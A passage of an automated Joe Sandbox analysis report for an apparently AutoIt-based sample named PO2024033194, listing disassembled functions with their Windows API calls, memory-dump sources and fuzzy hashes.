                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentStrings$Free__malloc_crt
                                                                  • String ID:
                                                                  • API String ID: 237123855-0
                                                                  • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                  • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                  • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                  • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                  Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: DeleteDestroyObject$IconWindow
                                                                  • String ID:
                                                                  • API String ID: 3349847261-0
                                                                  • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                  • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                  • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                  • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                  Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                  • String ID:
                                                                  • API String ID: 2223660684-0
                                                                  • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                  • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                  • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                  • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                  Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                  • LineTo.GDI32(?,?,?), ref: 00447326
                                                                  • EndPath.GDI32(?), ref: 00447336
                                                                  • StrokePath.GDI32(?), ref: 00447344
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                  • String ID:
                                                                  • API String ID: 2783949968-0
                                                                  • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                  • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                  • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                  • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                  Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                  • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                  • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 2710830443-0
                                                                  • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                  • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                  • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                  • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                  Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                  • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                    • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                    • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                  • String ID:
                                                                  • API String ID: 146765662-0
                                                                  • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                  • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                  • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                  • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                  Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDesktopWindow.USER32 ref: 00472B63
                                                                  • GetDC.USER32(00000000), ref: 00472B6C
                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                  • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                  • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                  • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                  • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                  Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDesktopWindow.USER32 ref: 00472BB2
                                                                  • GetDC.USER32(00000000), ref: 00472BBB
                                                                  • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                  • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                  • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                  • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                  • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                  Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __getptd_noexit.LIBCMT ref: 00415150
                                                                    • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                    • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                    • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                    • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                    • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                  • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                  • __freeptd.LIBCMT ref: 0041516B
                                                                  • ExitThread.KERNEL32 ref: 00415173
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 1454798553-0
                                                                  • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                  • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                  • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                  • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                  Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _strncmp
                                                                  • String ID: Q\E
                                                                  • API String ID: 909875538-2189900498
                                                                  • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                  • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                  • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                  • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                  Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                  • String ID: AutoIt3GUI$Container
                                                                  • API String ID: 2652923123-3941886329
                                                                  • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                  • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                  • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                  • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                  Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove_strncmp
                                                                  • String ID: U$\
                                                                  • API String ID: 2666721431-100911408
                                                                  • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                  • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                  • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                  • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                  Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                  • __wcsnicmp.LIBCMT ref: 00467288
                                                                  • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                  • String ID: LPT
                                                                  • API String ID: 3035604524-1350329615
                                                                  • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                  • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                  • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                                  • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                  Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: \$h
                                                                  • API String ID: 4104443479-677774858
                                                                  • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                  • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                  • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
